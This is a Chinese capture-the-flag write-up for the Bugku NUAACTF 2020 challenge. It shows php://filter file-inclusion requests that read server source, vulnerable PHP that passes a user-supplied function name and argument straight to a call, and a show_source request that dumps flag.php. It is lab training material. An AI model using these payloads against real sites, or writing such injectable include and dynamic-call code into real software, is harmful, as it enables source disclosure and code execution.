news 2026/5/9 16:38:39

Bugku NUAACTF 2020 command-injection

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Bugku NUAACTF 2020 command-injection

前置知识

网络安全 文件包含漏洞-CSDN博客

解题过程

打开靶场、进行信息收集

在源码中发现include文件,直接访问,自动添加了URL参数file

/include.php?file=index

并且自动补齐了index参数,页面也跟初始页面相同,很明显是文件包含漏洞

直接尝试php伪协议读取下已知的源码,根据自动补齐的index参数,可以猜测后端是自动补齐.php,读取index.php:

/include.php?file=php://filter/read=convert.base64-encode/resource=index
<?php print <<<EOT <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body> <!--include.php--> <img src="img.jpg" alt="嘉木天下第一" /> </body> </html> EOT; ?>

读取include.php:

/include.php?file=php://filter/read=convert.base64-encode/resource=include
<?php error_reporting(0); @$file = $_GET["file"]; if(isset($file)) { if (preg_match('/http|data|ftp|input|%00|flag/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=100) { echo "<p> error! </p>"; } else { include($file.'.php'); setcookie("tips","createfun.php"); } } else { header('Location:include.php?file=index'); } ?>

可以看到include.php过滤了敏感字符,我们无法直接读取flag

并且我们又看到另一个文件createfun.php,继续读取该文件:

/include.php?file=php://filter/read=convert.base64-encode/resource=createfun
<?php $func = @$_GET['func']; $arg = @$_GET['arg']; if(isset($func)&&isset($arg)){$func($arg,'');}

分析源码,获取两个参数,一个作为函数名,一个作为函数参数,然后会执行函数。

需要注意这个函数有两个参数,后面被自动设置为空,这里很多函数可以用,这里采用show_source,显示flag.php文件内容,这里flag.php可以通过前面include文件得出,也可以扫文件得到:

/createfun.php?func=show_source&arg=flag.php
<?php $flag="nuaactf{php_IS_thE_best_language}"; ?>

总结

一道基础的文件包含漏洞,包含了一些代码审计部分。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/29 4:11:28

如何用AI预测系统MTTF,提升开发可靠性

快速体验 打开 InsCode(快马)平台 https://www.inscode.net输入框内输入如下内容&#xff1a; 创建一个基于机器学习的MTTF预测系统。系统需要能够&#xff1a;1. 导入历史设备运行数据&#xff08;CSV格式&#xff09;&#xff1b;2. 自动进行数据清洗和特征工程&#xff1b;…

作者头像 李华
网站建设 2026/4/26 19:52:28

GPT-5.2震撼发布:三档模型精准出击,性能全面革新!

一场由谷歌Gemini 3引发的AI军备竞赛&#xff0c;促使OpenAI启动“红色警报”&#xff0c;在短短一个月内完成了从GPT-5.1到GPT-5.2的跨越式升级。北京时间12月11日&#xff0c;OpenAI正式发布了GPT-5的最新升级版本GPT-5.2。这一版本在通用智能、长文本处理、智能体工具调用和…

作者头像 李华
网站建设 2026/5/8 23:27:21

GIS数据终极指南:河南省行政区划完整教程

GIS数据终极指南&#xff1a;河南省行政区划完整教程 【免费下载链接】中国省级行政区划-河南省shp 本资源提供了中国省级行政区划的数据&#xff0c;特别是针对河南省的详细地理信息。以Shapefile&#xff08;.shp&#xff09;格式呈现&#xff0c;这是GIS&#xff08;地理信息…

作者头像 李华
网站建设 2026/4/26 6:27:06

单步生成革命:OpenAI一致性模型如何重塑AI图像创作效率

导语 【免费下载链接】diffusers-ct_cat256 项目地址: https://ai.gitcode.com/hf_mirrors/openai/diffusers-ct_cat256 OpenAI推出的Consistency Model&#xff08;一致性模型&#xff09;通过一步生成高质量图像的技术突破&#xff0c;正在重新定义AI创作工具的效率标…

作者头像 李华
网站建设 2026/5/9 9:40:32

如何快速掌握active-win:跨平台窗口信息获取终极指南

如何快速掌握active-win&#xff1a;跨平台窗口信息获取终极指南 【免费下载链接】active-win Get metadata about the active window (title, id, bounds, owner, etc) 项目地址: https://gitcode.com/gh_mirrors/ac/active-win 在现代多任务工作环境中&#xff0c;窗口…

作者头像 李华